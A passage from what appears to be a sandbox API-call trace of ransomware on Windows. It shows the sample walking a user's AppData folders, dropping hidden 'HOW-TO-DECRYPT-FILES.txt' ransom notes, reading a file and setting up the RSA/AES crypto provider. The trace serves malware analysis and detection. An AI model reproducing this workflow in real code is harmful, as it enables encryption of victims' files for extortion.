lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\tur", lpFilePart=0x0) returned 0x5c [0050.159] GetLastError () returned 0x12 [0050.159] SetErrorMode (uMode=0x1) returned 0x0 [0050.159] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\tur\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.160] GetLastError () returned 0x12 [0050.160] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.160] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.160] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.160] SetErrorMode (uMode=0x0) returned 0x1 [0050.160] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\tur", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\tur", lpFilePart=0x0) returned 0x5c [0050.160] GetLastError () returned 0x12 [0050.160] SetErrorMode (uMode=0x1) returned 0x0 [0050.160] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\tur\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.160] GetLastError () returned 0x12 [0050.160] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.160] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.160] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.160] SetErrorMode (uMode=0x0) returned 0x1 [0050.160] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Microsoft", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Microsoft", lpFilePart=0x0) returned 0x2b [0050.160] GetLastError () returned 0x12 [0050.161] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun", lpFilePart=0x0) returned 0x25 [0050.161] GetLastError () returned 0x12 [0050.161] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.161] GetLastError () returned 0x12 [0050.161] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun", lpFilePart=0x0) returned 0x25 [0050.161] GetLastError () returned 0x12 [0050.161] SetErrorMode (uMode=0x1) returned 0x0 [0050.161] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.161] GetLastError () returned 0x12 [0050.161] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.161] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.161] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.161] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.161] SetErrorMode (uMode=0x0) returned 0x1 [0050.161] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun", lpFilePart=0x0) returned 0x25 [0050.161] GetLastError () returned 0x12 [0050.161] SetErrorMode (uMode=0x1) returned 0x0 [0050.161] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.162] GetLastError () returned 0x12 [0050.162] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.162] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.162] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.162] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.162] SetErrorMode (uMode=0x0) returned 0x1 [0050.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java", lpFilePart=0x0) returned 0x2a [0050.162] GetLastError () returned 0x12 [0050.162] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.162] GetLastError () returned 0x12 [0050.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java", lpFilePart=0x0) returned 0x2a [0050.162] GetLastError () returned 0x12 [0050.162] SetErrorMode (uMode=0x1) returned 0x0 [0050.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.162] GetLastError () returned 0x12 [0050.162] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.162] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.162] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.162] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.162] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.162] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.162] SetErrorMode (uMode=0x0) returned 0x1 [0050.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java", lpFilePart=0x0) returned 0x2a [0050.162] GetLastError () returned 0x12 [0050.162] SetErrorMode (uMode=0x1) returned 0x0 [0050.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.163] GetLastError () returned 0x12 [0050.163] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.163] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.163] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.163] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.163] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.163] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.163] SetErrorMode (uMode=0x0) returned 0x1 [0050.163] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\AU", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\AU", lpFilePart=0x0) returned 0x2d [0050.163] GetLastError () returned 0x12 [0050.163] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.163] GetLastError () returned 0x12 [0050.163] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.163] GetLastError () returned 0x12 [0050.163] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.163] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.163] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.164] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.164] SetErrorMode (uMode=0x0) returned 0x1 [0050.164] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.164] GetLastError () returned 0x12 [0050.164] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.164] SetErrorMode (uMode=0x0) returned 0x1 [0050.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\au\\au.cab"), fInfoLevelId=0x0, lpFileInformation=0x1b3edc8 | out: lpFileInformation=0x1b3edc8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6cfe4a40, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x6cfe4a40, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x6cfe4a40, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x8e062)) returned 1 [0050.165] GetLastError () returned 0x12 [0050.165] SetErrorMode (uMode=0x0) returned 0x1 [0050.165] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\AU\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\au\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.165] GetLastError () returned 0x0 [0050.165] GetFileType (hFile=0x184) returned 0x1 [0050.166] SetErrorMode (uMode=0x0) returned 0x1 [0050.166] GetFileType (hFile=0x184) returned 0x1 [0050.166] WriteFile (in: hFile=0x184, lpBuffer=0x1b5a83c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ebe8, lpOverlapped=0x0 | out: lpBuffer=0x1b5a83c*, lpNumberOfBytesWritten=0x18ebe8*=0x18da, lpOverlapped=0x0) returned 1 [0050.166] GetLastError () returned 0x0 [0050.167] CloseHandle (hObject=0x184) returned 1 [0050.167] GetLastError () returned 0x0 [0050.167] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\AU\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0050.167] GetLastError () returned 0x0 [0050.167] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\au\\au.msi"), fInfoLevelId=0x0, lpFileInformation=0x1b5c508 | out: lpFileInformation=0x1b5c508*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6cfe4a40, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x6cfe4a40, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x6cfe4a40, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x2d400)) returned 1 [0050.167] GetLastError () returned 0x0 [0050.167] SetErrorMode (uMode=0x0) returned 0x1 [0050.168] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\AU\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\au\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.168] GetLastError () returned 0x5 [0050.168] SetErrorMode (uMode=0x0) returned 0x1 [0050.169] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.169] GetLastError () returned 0x5 [0050.169] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.169] SetErrorMode (uMode=0x0) returned 0x1 [0050.169] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.169] GetLastError () returned 0x12 [0050.169] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.169] SetErrorMode (uMode=0x0) returned 0x1 [0050.170] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), fInfoLevelId=0x0, lpFileInformation=0x1b7ba20 | out: lpFileInformation=0x1b7ba20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80dd3c10, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x80dd3c10, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0xfce9df10, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3)) returned 1 [0050.170] GetLastError () returned 0x12 [0050.170] SetErrorMode (uMode=0x0) returned 0x1 [0050.170] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\deployment\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.171] GetLastError () returned 0x0 [0050.172] GetFileType (hFile=0x184) returned 0x1 [0050.172] SetErrorMode (uMode=0x0) returned 0x1 [0050.172] GetFileType (hFile=0x184) returned 0x1 [0050.172] WriteFile (in: hFile=0x184, lpBuffer=0x1b97520*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ebe8, lpOverlapped=0x0 | out: lpBuffer=0x1b97520*, lpNumberOfBytesWritten=0x18ebe8*=0x18da, lpOverlapped=0x0) returned 1 [0050.173] GetLastError () returned 0x0 [0050.173] CloseHandle (hObject=0x184) returned 1 [0050.173] GetLastError () returned 0x0 [0050.173] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0050.173] GetLastError () returned 0x0 [0050.173] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.173] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.174] GetLastError () returned 0x0 [0050.174] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.174] SetErrorMode (uMode=0x0) returned 0x1 [0050.175] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.175] GetLastError () returned 0x12 [0050.175] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.175] SetErrorMode (uMode=0x0) returned 0x1 [0050.175] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.175] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.175] GetLastError () returned 0x12 [0050.176] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.176] SetErrorMode (uMode=0x0) returned 0x1 [0050.176] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.176] GetLastError () returned 0x12 [0050.177] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.177] SetErrorMode (uMode=0x0) returned 0x1 [0050.177] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.177] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.177] GetLastError () returned 0x12 [0050.178] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.178] SetErrorMode (uMode=0x0) returned 0x1 [0050.178] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.178] GetLastError () returned 0x12 [0050.178] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.178] SetErrorMode (uMode=0x0) returned 0x1 [0050.178] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.179] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.179] GetLastError () returned 0x12 [0050.179] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.179] SetErrorMode (uMode=0x0) returned 0x1 [0050.179] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.179] GetLastError () returned 0x12 [0050.180] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.180] SetErrorMode (uMode=0x0) returned 0x1 [0050.180] SetErrorMode (uMode=0x1) returned 0x0 [0050.180] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1b9e400 | out: lpFileInformation=0x1b9e400*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58231e20, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x58231e20, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x5833c7c0, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x182ac2a)) returned 1 [0050.184] GetLastError () returned 0x12 [0050.184] SetErrorMode (uMode=0x0) returned 0x1 [0050.185] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.196] GetLastError () returned 0x0 [0050.196] GetFileType (hFile=0x184) returned 0x1 [0050.196] SetErrorMode (uMode=0x0) returned 0x1 [0050.196] GetFileType (hFile=0x184) returned 0x1 [0050.196] WriteFile (in: hFile=0x184, lpBuffer=0x1bb9dbc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ebe8, lpOverlapped=0x0 | out: lpBuffer=0x1bb9dbc*, lpNumberOfBytesWritten=0x18ebe8*=0x18da, lpOverlapped=0x0) returned 1 [0050.197] GetLastError () returned 0x0 [0050.197] CloseHandle (hObject=0x184) returned 1 [0050.197] GetLastError () returned 0x0 [0050.197] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0050.197] GetLastError () returned 0x0 [0050.197] SetErrorMode (uMode=0x1) returned 0x0 [0050.197] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), fInfoLevelId=0x0, lpFileInformation=0x1bbbaa8 | out: lpFileInformation=0x1bbbaa8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5833c7c0, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x5833c7c0, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x5833c7c0, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0xdd600)) returned 1 [0050.198] GetLastError () returned 0x0 [0050.198] SetErrorMode (uMode=0x0) returned 0x1 [0050.198] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.198] GetLastError () returned 0x5 [0050.199] SetErrorMode (uMode=0x0) returned 0x1 [0050.200] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.200] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.200] GetLastError () returned 0x5 [0050.203] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.203] SetErrorMode (uMode=0x0) returned 0x1 [0050.203] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.203] GetLastError () returned 0x12 [0050.203] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.203] SetErrorMode (uMode=0x0) returned 0x1 [0050.203] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-08ienzng1in.gif"), fInfoLevelId=0x0, lpFileInformation=0x1bde330 | out: lpFileInformation=0x1bde330*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200d98c0, ftCreationTime.dwHighDateTime=0x1d35211, ftLastAccessTime.dwLowDateTime=0x37298620, ftLastAccessTime.dwHighDateTime=0x1d3506a, ftLastWriteTime.dwLowDateTime=0x37298620, ftLastWriteTime.dwHighDateTime=0x1d3506a, nFileSizeHigh=0x0, nFileSizeLow=0x17ce9)) returned 1 [0050.203] GetLastError () returned 0x12 [0050.203] SetErrorMode (uMode=0x0) returned 0x1 [0050.204] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-08ienzng1in.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.204] GetLastError () returned 0x0 [0050.204] GetFileType (hFile=0x184) returned 0x1 [0050.204] SetErrorMode (uMode=0x0) returned 0x1 [0050.204] GetFileType (hFile=0x184) returned 0x1 [0050.204] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x17ce9 [0050.204] GetLastError () returned 0x0 [0050.204] ReadFile (in: hFile=0x184, lpBuffer=0x2ae8450, nNumberOfBytesToRead=0x17ce9, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2ae8450*, lpNumberOfBytesRead=0x18ed18*=0x17ce9, lpOverlapped=0x0) returned 1 [0050.205] GetLastError () returned 0x0 [0050.205] CloseHandle (hObject=0x184) returned 1 [0050.205] GetLastError () returned 0x0 [0050.206] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-08ienzng1in.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200d98c0, ftCreationTime.dwHighDateTime=0x1d35211, ftLastAccessTime.dwLowDateTime=0x37298620, ftLastAccessTime.dwHighDateTime=0x1d3506a, ftLastWriteTime.dwLowDateTime=0x37298620, ftLastWriteTime.dwHighDateTime=0x1d3506a, nFileSizeHigh=0x0, nFileSizeLow=0x17ce9)) returned 1 [0050.206] GetLastError () returned 0x0 [0050.206] SetErrorMode (uMode=0x0) returned 0x1 [0050.206] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0050.207] GetLastError () returned 0x0 [0050.235] CryptImportKey (in: hProv=0x37c790, pbData=0x1c3a408, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360a20) returned 1 [0050.235] GetLastError () returned 0x0 [0050.235] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.235] GetLastError () returned 0x0 [0050.240] CryptContextAddRef 